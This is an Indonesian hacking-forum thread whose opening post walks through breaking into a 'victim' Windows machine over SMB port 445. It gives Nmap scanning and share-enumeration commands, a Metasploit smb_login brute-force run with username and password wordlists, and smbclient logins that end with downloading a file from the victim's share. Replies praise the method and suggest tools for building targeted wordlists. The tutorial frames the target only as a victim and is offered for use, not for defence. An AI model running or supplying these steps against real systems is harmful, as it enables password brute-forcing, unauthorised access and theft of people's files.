Exploit Samba "SmbClient"
#1
Sama halnya seperti File Transfer Protocol atau lebih dikenal dengan FTP. samba juga mencakup hal-hal seperti misalnya mendapatkan file dari server ke komputer lokal, meletakkan file dari komputer lokal ke server, serta mengambil informasi direktori dari server dan sebagainya.

dalam kasus ini kita harus memiliki korban yang mengaktifkan mode share folder, maka dari itu exploit ini berhasil Smile

Equipments:
1. smbclient
2. Nmap
3. Metasploit


tahap pertama melakukan scanning port terhadap host/ip-address korban menggunakan Nmap. Disini yang kita perlukan adalah port 445 microsoft-ds.
Code:
# Nmap (Victim Ip-Address)
Spoiler! :

[Image: 1.png]


terlihat pd gambar diatas, port yang kita butuhkan terbuka.

sekarang mari kita lihat lebih dalam mengenai port tersebut.
Code:
# nmap -p445 --script=smb-os-discovery (Victim Ip-Address)

--Script=smb-os-discovery: Upaya untuk menentukan sistem operasi, nama komputer, domain, workgroup, dan waktu saat ini melalui protokol SMB (port 445 atau 139).
Spoiler! :

[Image: 2.png]


terlihat di atas, ternyata korban kita menggunakan Sistem Operasi Windows 7 Ultimate.
Nama Komputer adalah ANONYMOUS-PC.

selanjutnya melihat list shared folder di dalam host korban.
Code:
# nmap -p445 --script=smb-enum-shares (Victim Ip-Address)
Spoiler! :

[Image: 4.png]


terlihat si korban memiliki folder yang di share =)
tampaknya exploitasi kali ini akan bekerja.

selanjutnya menjalankan SmbClient
Code:
# smbclient -L (Victim Ip-Address) -U (Computer Name) -p (port 445)
Spoiler! :

[Image: a.png]


Dam* > _ <,
kita dimintai memasukkan password, bagaimana kita mendapatkan password ??? maka akan mustahil untuk sukses dengan menebak password yang dimiliki oleh korban.

jgn menyerah dulu, mari kita lanjutkan dengan metasploit ^ _ ^
Code:
# msfconsole
msf  > use auxiliary/scanner/smb/smb_login
msf  auxiliary (smb_login) > set RHOSTS Victim Ip-Address (Range)
msf  auxiliary (smb_login) > set PASS_FILE /Path/Your/Password_wordlist/*.txt
msf  auxiliary (smb_login) > set USER_FILE /Path/Your/Username_wordlist/*.txt
msf  auxiliary (smb_login) > run
Spoiler! :

[Image: b.png]


yups, kita berhasil mendapatkan password Smile
sekarang, kita kembali untuk login untuk mendapatkan list share folder yang tersedia pada host
Code:
# Smbclient -L (Korban Ip-Alamat) -U (Nama Komputer) -p (port 445)
Spoiler! :

[Image: 6.png]


terlihat diatas ada beberapa list share folder korban.
selanjutnya kita mencoba mengakses disk C yang ada di komputer korban
Code:
# smbclient //Victim Ip-Address/C -U (Computer Name) -p (Port 445)
Spoiler! :

[Image: 7.png]


Failed ??? Status Bad For Network Name.

jelas terlihat bahwa kita tidak dapat masuk ke disk C yang ada pada komputer korban. selanjutnya kita coba masuk pada disk Smb-Shares
Code:
# smbclient //Victim Ip-Address//Smb-Shares -U (Computer Name) -p (Port 445)
Spoiler! :

[Image: 8.png]


Success Smile
terlihat ada sebuah file dengan nama Smb-Shares-File.txt

kemudian saya mendownload file tersebut.
Code:
smb: \> get Smb-Shared-file.txt

get = Perintah untuk mendownload file dari host korban

Spoiler! :

[Image: 9.png]


dan hasilnya :

Spoiler! :

[Image: 10.png]



regards

source
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#2
Manteb mas..

Tapi bakalan fail kalo di dictionary nya gak ada yang cocok :3

Seep Angry

#3
tutorialnya keren dul. kudu mantep tuh dictionary nya tuh, tapi bisa digunain crunch atau cupp di backtrack buat socengan wordlistnya. cek kulkas +1 for you dul
Quote:~ Tan Hana Wighna Tan Sirna ~

#4
Bah galau dah gua, dimana" bs di exploit.. -_- memanfaatkan si samba server untuk memanipulasi backdoor dengan metasploit lagi, again and again metasploit... arghhhh.. windows is danger to use... Sad( =)) Mantap dah om H2, enggk nyangka bs seperti ini. Confused:-
<p>=========Cyberly================

Indonesian Backtrack Team Regional Aceh

" Walau diam tetap belajar"

GPComp</p>

#5
(10-13-2013, 09:29 AM)gnome_selpa Wrote: tutorialnya keren dul. kudu mantep tuh dictionary nya tuh, tapi bisa digunain crunch atau cupp di backtrack buat socengan wordlistnya. cek kulkas +1 for you dul

thanks for ijo2nya dul, Tongue:-

(10-13-2013, 10:29 AM)cyberly Wrote: Bah galau dah gua, dimana" bs di exploit.. -_- memanfaatkan si samba server untuk memanipulasi backdoor dengan metasploit lagi, again and again metasploit... arghhhh.. windows is danger to use... Sad( =)) Mantap dah om H2, enggk nyangka bs seperti ini. Confused:-

sebetulnya saya juga ndak menyangka, pertama hanya memanfaatkan Nmap saja buat scanning host.
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#6
Mau tanya om, port 445 itu akan terbuka kalo kita share folder ya?

#7
(10-20-2013, 12:06 PM)Doel Wrote: Mau tanya om, port 445 itu akan terbuka kalo kita share folder ya?

port 445 memang sudah tertanam di windows tidak menutup kemungkinan jika share folder tidak dijalankan port tersebut tertutup Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#8
nice share mas bro ..
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#9
seperti bruteforce ya ini mas ?

#10
(01-05-2014, 11:47 AM)jrs_faisal Wrote: seperti bruteforce ya ini mas ?

untuk mencari tahu passwordnya memang menggunakan bruteforce Smile
tapi inti pembahasan postingan diatas bukan mengenai bruteforce nya mas Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]






Users browsing this thread: 1 Guest(s)